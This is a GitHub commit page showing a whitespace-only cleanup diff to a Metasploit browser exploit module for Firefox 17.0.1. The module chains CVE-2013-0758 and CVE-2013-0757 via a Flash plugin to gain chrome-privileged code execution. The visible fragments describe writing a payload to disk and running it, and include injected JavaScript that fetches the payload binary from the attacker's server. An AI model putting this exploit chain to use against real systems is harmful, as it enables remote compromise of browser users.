Skip to content

Commit aae4768

Browse files
committed
Fix whitespace issues from msftidy.
1 parent eaeb107 commit aae4768

File tree

1 file changed

+9
-9
lines changed

1 file changed

+9
-9
lines changed

modules/exploits/multi/browser/firefox_svg_plugin.rb

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -19,21 +19,21 @@ def initialize(info = {})
1919
'Description' => %q{
2020
This exploit gains remote code execution on Firefox 17.0.1 and all previous
2121
versions, provided the user has installed Flash. No memory corruption is used.
22-
23-
First, a Flash object is cloned into the anonymous content of the SVG
22+
23+
First, a Flash object is cloned into the anonymous content of the SVG
2424
"use" element in the <body> (CVE-2013-0758). From there, the Flash object
25-
can navigate a child frame to a URL in the chrome:// scheme.
26-
25+
can navigate a child frame to a URL in the chrome:// scheme.
26+
2727
Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper
2828
around the child frame's window reference and inject code into the chrome://
2929
context. Once we have injection into the chrome execution context, we can write
3030
the payload to disk, chmod it (if posix), and then execute.
31-
31+
3232
Note: Flash is used here to trigger the exploit but any Firefox plugin
3333
with script access should be able to trigger it.
3434
},
3535
'License' => MSF_LICENSE,
36-
'Targets' => [
36+
'Targets' => [
3737
[ 'Windows x86 (Native Payload)',
3838
{
3939
'Platform' => 'win',
@@ -62,7 +62,7 @@ def initialize(info = {})
6262
'References' =>
6363
[
6464
['CVE', '2013-0758'], # navigate a frame to a chrome:// URL
65-
['CVE', '2013-0757'], # bypass Chrome Object Wrapper to talk to chrome://
65+
['CVE', '2013-0757'], # bypass Chrome Object Wrapper to talk to chrome://
6666
['URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-15.html'],
6767
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=813906']
6868
],
@@ -132,7 +132,7 @@ def flash_trigger
132132
@flash_trigger ||= File.read(swf_path)
133133
end
134134

135-
# @return [String] the filename that will be used when the payload is dropped
135+
# @return [String] the filename that will be used when the payload is dropped
136136
def payload_filename
137137
if target.name == 'Windows x86 (Native Payload)'
138138
"#{Rex::Text.rand_text_alphanumeric(8)}.exe"
@@ -146,7 +146,7 @@ def js_payload
146146
%Q|
147147
#{js_debug("Injection successful. JS executing with chrome privileges.")}
148148
var x = new XMLHttpRequest;
149-
x.overrideMimeType('text/plain; charset=x-user-defined');
149+
x.overrideMimeType('text/plain; charset=x-user-defined');
150150
x.open('POST', '#{base_url}.bin', false);
151151
x.send(null);
152152
#{js_debug("'Payload: '+x.responseText", "")}

0 commit comments

Comments
 (0)